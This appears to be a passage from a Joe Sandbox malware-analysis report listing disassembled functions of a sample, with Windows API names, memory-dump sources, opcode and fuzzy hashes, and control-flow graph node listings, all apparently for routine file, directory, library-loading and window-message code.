                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                            • String ID: api-ms-
                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                            • Opcode ID: 836dda5ebf99ea71ff7688ad91a938b64698afc5c00f0818a61eb0d3a198c856
                                                                                                            • Instruction ID: 82ff5d2263ec22995d86ed2d0e852172d8719b0ae3ce566a002ab1115158332d
                                                                                                            • Opcode Fuzzy Hash: 836dda5ebf99ea71ff7688ad91a938b64698afc5c00f0818a61eb0d3a198c856
                                                                                                            • Instruction Fuzzy Hash: 4D319632E1AA47A1EE11BF02A400675A3B6BF14BA0FD94535DD1D47794EF3CE4809760
                                                                                                            Function 00007FF7390C8C90 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                                                                            • String ID:
                                                                                                            • API String ID: 2092733347-0
                                                                                                            • Opcode ID: f077b6d05eac841131ce339f4443a2304e56e2abf94e7793718b30ba6834b201
                                                                                                            • Instruction ID: 99087e2ba868c9bd2b7231379b5a54d5c37ced428cf42953d030f65a9102c723
                                                                                                            • Opcode Fuzzy Hash: f077b6d05eac841131ce339f4443a2304e56e2abf94e7793718b30ba6834b201
                                                                                                            • Instruction Fuzzy Hash: 06316772F10A569EFB00DFB4E8801AC7371FB08758B94502AEE4E97A58EF38D885C710
                                                                                                            Function 00007FF7390D5598 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
                                                                                                            • String ID: ]
                                                                                                            • API String ID: 3561356813-3352871620
                                                                                                            • Opcode ID: 9a0c98e894c03ffcd4a5441dfbccd5c948591e1238010eb56e1fc7e2f4ec0ff3
                                                                                                            • Instruction ID: 09f688350ce00d9a258fa9c6c3a7cdcd43a0ab7ccaca36c747c03f40057d3deb
                                                                                                            • Opcode Fuzzy Hash: 9a0c98e894c03ffcd4a5441dfbccd5c948591e1238010eb56e1fc7e2f4ec0ff3
                                                                                                            • Instruction Fuzzy Hash: 76114622B0D747A1EB14BF61A654279E6B3AF88BC4F880034DD4D47BD9DE3DE8059A20
                                                                                                            Function 00007FF7390C2C38 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                            • String ID:
                                                                                                            • API String ID: 588606609-0
                                                                                                            • Opcode ID: 637186fa3c3a0b2a1a46163e4f5bb9ed4ad6f9d35f3b9fc901c049c7af9b35d3
                                                                                                            • Instruction ID: 363a64d31f0ac67ad88312aa0384cb1517d0cb6276fe14f0d73e12df098d918a
                                                                                                            • Opcode Fuzzy Hash: 637186fa3c3a0b2a1a46163e4f5bb9ed4ad6f9d35f3b9fc901c049c7af9b35d3
                                                                                                            • Instruction Fuzzy Hash: CD41D522B05747A5EE04AF55D4401B8A3B2EB54BE0FD44631DABD0BBE5EE3CE491D710
                                                                                                            Function 00007FF7390C2420 Relevance: 7.6, APIs: 5, Instructions: 121filetimeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1822 7ff7390c2420-7ff7390c245c call 7ff7390d9920 1825 7ff7390c2469 1822->1825 1826 7ff7390c245e-7ff7390c2462 1822->1826 1828 7ff7390c246c-7ff7390c24e0 CreateFileW 1825->1828 1826->1825 1827 7ff7390c2464-7ff7390c2467 1826->1827 1827->1828 1829 7ff7390c24e2-7ff7390c24ff GetLastError call 7ff7390c44c8 1828->1829 1830 7ff7390c2540-7ff7390c2544 1828->1830 1839 7ff7390c2551 1829->1839 1840 7ff7390c2501-7ff7390c253e CreateFileW GetLastError 1829->1840 1831 7ff7390c2549-7ff7390c254d 1830->1831 1833 7ff7390c254f 1831->1833 1834 7ff7390c2564-7ff7390c2568 1831->1834 1836 7ff7390c2556-7ff7390c2558 1833->1836 1837 7ff7390c256a-7ff7390c256e 1834->1837 1838 7ff7390c258e-7ff7390c25a2 1834->1838 1836->1834 1841 7ff7390c255a 1836->1841 1837->1838 1842 7ff7390c2570-7ff7390c2588 SetFileTime 1837->1842 1843 7ff7390c25a4-7ff7390c25ba call 7ff7390c8168 1838->1843 1844 7ff7390c25be-7ff7390c25e7 call 7ff7390d98e0 1838->1844 1839->1836 1840->1831 1841->1834 1842->1838 1843->1844
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateErrorLast$Time
                                                                                                            • String ID:
                                                                                                            • API String ID: 1999340476-0
                                                                                                            • Opcode ID: 3bbd8de99f0dfc51370835f580a6aee9a4f553259208b39ccc721594bc8a4348
                                                                                                            • Instruction ID: 89c8295aa5cef469a818dc1b6fef938199279a4d0ffc3df686319d79b8137716
                                                                                                            • Opcode Fuzzy Hash: 3bbd8de99f0dfc51370835f580a6aee9a4f553259208b39ccc721594bc8a4348
                                                                                                            • Instruction Fuzzy Hash: 40413972B0868256F7249F29D41536AA672E740BB8F940334EEAD4BAD8CF7DD4449B10
                                                                                                            Function 00007FF7390E6534 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1849 7ff7390e6534-7ff7390e658a 1850 7ff7390e66b5 1849->1850 1851 7ff7390e6590-7ff7390e6593 1849->1851 1852 7ff7390e66b7-7ff7390e66d3 1850->1852 1853 7ff7390e6595-7ff7390e6598 1851->1853 1854 7ff7390e659d-7ff7390e65a0 1851->1854 1853->1852 1855 7ff7390e65a6-7ff7390e65b4 1854->1855 1856 7ff7390e6649 1854->1856 1858 7ff7390e65b6-7ff7390e65b9 1855->1858 1859 7ff7390e65bd-7ff7390e65dc LoadLibraryExW 1855->1859 1857 7ff7390e664b-7ff7390e664e 1856->1857 1862 7ff7390e6650-7ff7390e665f GetProcAddress 1857->1862 1863 7ff7390e669a-7ff7390e66ad 1857->1863 1864 7ff7390e6635-7ff7390e663c 1858->1864 1865 7ff7390e65bb 1858->1865 1860 7ff7390e65fe-7ff7390e6608 1859->1860 1861 7ff7390e65de-7ff7390e65e7 GetLastError 1859->1861 1869 7ff7390e6617-7ff7390e6625 1860->1869 1870 7ff7390e660a-7ff7390e6615 1860->1870 1867 7ff7390e65fc 1861->1867 1868 7ff7390e65e9-7ff7390e65fa LoadLibraryExW 1861->1868 1872 7ff7390e6693 1862->1872 1873 7ff7390e6661-7ff7390e6688 1862->1873 1863->1850 1864->1855 1871 7ff7390e6642 1864->1871 1866 7ff7390e6630-7ff7390e6633 1865->1866 1866->1864 1875 7ff7390e668a-7ff7390e6691 1866->1875 1867->1860 1868->1860 1869->1866 1874 7ff7390e6627-7ff7390e662a FreeLibrary 1869->1874 1870->1864 1871->1856 1872->1863 1873->1852 1874->1866 1875->1857
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 190572456-0
                                                                                                            • Opcode ID: db4c112d31413e39b3000df675efb9702124e3d2c8f94a740e964f46a0af5221
                                                                                                            • Instruction ID: c82e26798f3e8b661e87db90e012930402360b6cb6e3fc028a85f48b06135214
                                                                                                            • Opcode Fuzzy Hash: db4c112d31413e39b3000df675efb9702124e3d2c8f94a740e964f46a0af5221
                                                                                                            • Instruction Fuzzy Hash: 2741E262F1AA4BA1FA11BF01B804579E3B6BF44BA0F994535DD1D8B784EF3CE440A320
                                                                                                            Function 00007FF7390D53A0 Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1266772231-0
                                                                                                            • Opcode ID: 5f5c90df7198428124567ceda02b33719cfeed444350051be0d47f656ce59d7f
                                                                                                            • Instruction ID: c4cf63927648c7efba22ca5f1fe44a233bca8d17b757f25158c187e099e91346
                                                                                                            • Opcode Fuzzy Hash: 5f5c90df7198428124567ceda02b33719cfeed444350051be0d47f656ce59d7f
                                                                                                            • Instruction Fuzzy Hash: C9F0FF26B38942A2EB50AF64F8D5A36A372FF94705FC05030EA4F51854DF7DD509EB10
                                                                                                            Function 00007FF7390D45F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                            • String ID: EDIT
                                                                                                            • API String ID: 4243998846-3080729518
                                                                                                            • Opcode ID: effa28ef0a531a0ca80e413958961d0d8849bbb69c481397a3838a8d7711c527
                                                                                                            • Instruction ID: 55492ec2bd6946c5531d73e810ba0ed23b81d7feb6b110f264508e08fd13f0a1
                                                                                                            • Opcode Fuzzy Hash: effa28ef0a531a0ca80e413958961d0d8849bbb69c481397a3838a8d7711c527
                                                                                                            • Instruction Fuzzy Hash: 54016222B19B4761FA20BF21F8507B5E3B2AF98B80FC40031C98E06694DE6CD145A620
                                                                                                            Function 00007FF7390DA03C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1452418845-0
                                                                                                            • Opcode ID: 85e54690f41a012079f66530632c451383264533cc06b9835428997a4d5ebcf7
                                                                                                            • Instruction ID: 9fd4411729945a4598279385ceb298d2ec20e37f732d6f4760cdb23b4f7d3747
                                                                                                            • Opcode Fuzzy Hash: 85e54690f41a012079f66530632c451383264533cc06b9835428997a4d5ebcf7
                                                                                                            • Instruction Fuzzy Hash: F0315E22E0D50BA6FA14BF68D4523B996B39F41384FC41438E94E672D7DE2DE804E271
                                                                                                            Function 00007FF7390C22A4 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$FileHandleRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2244327787-0
                                                                                                            • Opcode ID: 5fa13731cb22174931b40eaa70b7567f67375bcddea9404ffcce443ca020713d
                                                                                                            • Instruction ID: 24f274b5af2811c5dff8eb42202c127c23172dacb8f7714442f03cf1d83c0ee8
                                                                                                            • Opcode Fuzzy Hash: 5fa13731cb22174931b40eaa70b7567f67375bcddea9404ffcce443ca020713d
                                                                                                            • Instruction Fuzzy Hash: 07219831E08547E5EA20BF19A40423DE772BF45BA4F944531DA9D4FAE8CF2CE845BB20
                                                                                                            Function 00007FF7390D47F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryInitializeMallocSystem
                                                                                                            • String ID: riched20.dll
                                                                                                            • API String ID: 174490985-3360196438
                                                                                                            • Opcode ID: 72556355e3ea42e7fb787924abbe4668ec8d9a7f703423adee8bc8b2325f4a02
                                                                                                            • Instruction ID: 333a001188f5e8224f65cb4987e39f292be61069dc4c05329d2112888fa01886
                                                                                                            • Opcode Fuzzy Hash: 72556355e3ea42e7fb787924abbe4668ec8d9a7f703423adee8bc8b2325f4a02
                                                                                                            • Instruction Fuzzy Hash: 51F04F72919A82A2EB00AF10F4441AAF3B1FB84754F800135E99E42654DFBCD54CDB10
                                                                                                            Function 00007FF7390E6070 Relevance: 4.7, APIs: 3, Instructions: 237COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$AllocHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3475569825-0
                                                                                                            • Opcode ID: c4e2cd8c2fe5dc7659fc2eef0e0b2d9fb80c552892d0a1dacc35bb58995dece5
                                                                                                            • Instruction ID: 3f7e4742c22d5a5f48ba148762d5455f77784bef4ecd64e1655fa72cda4af719
                                                                                                            • Opcode Fuzzy Hash: c4e2cd8c2fe5dc7659fc2eef0e0b2d9fb80c552892d0a1dacc35bb58995dece5
                                                                                                            • Instruction Fuzzy Hash: A1A1A072E18B4BA6EB25AF61E44037DA2E2FB44BA8F844635EA1D467C4DF7CE4449310
                                                                                                            Function 00007FF7390C2ADC Relevance: 4.6, APIs: 3, Instructions: 100fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite$Handle
                                                                                                            • String ID:
                                                                                                            • API String ID: 4209713984-0
                                                                                                            • Opcode ID: 0b1292ab1d1f56d60271f305ce80e77c3a12fac15b79dcade4e7281f13876e83
                                                                                                            • Instruction ID: 3b4235c92c7d49cbd97e4a866f6056625786805cfc01eaab214693badce85b71
                                                                                                            • Opcode Fuzzy Hash: 0b1292ab1d1f56d60271f305ce80e77c3a12fac15b79dcade4e7281f13876e83
                                                                                                            • Instruction Fuzzy Hash: E841D722A0CA57A2EB15EF18E554379A372FB44B44F944131DB8D0BEA4CF3CE595DB20
                                                                                                            Function 00007FF7390C3388 Relevance: 4.6, APIs: 3, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(00000001,00000001,?,00007FF7390C2FD7), ref: 00007FF7390C33D0
                                                                                                            • CreateDirectoryW.KERNEL32(00000001,00000001,?,00007FF7390C2FD7), ref: 00007FF7390C3405
                                                                                                            • GetLastError.KERNEL32(00000001,00000001,?,00007FF7390C2FD7), ref: 00007FF7390C3422
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectory$ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 2485089472-0
                                                                                                            • Opcode ID: c010215bec10dfec5153579e2d31ad1e76b910ec4fdc422f3ae070dd9d6887a1
                                                                                                            • Instruction ID: 70ddd03d1c4759fd7a96b05273d87d6c7ca2469373467c99db0c25db43032d30
                                                                                                            • Opcode Fuzzy Hash: c010215bec10dfec5153579e2d31ad1e76b910ec4fdc422f3ae070dd9d6887a1
                                                                                                            • Instruction Fuzzy Hash: EA218612A2868361EA617F3595813B9E273AF447C4FC44031E9CD4A6D5DE6CE985AA20
                                                                                                            Function 00007FF7390C93FC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
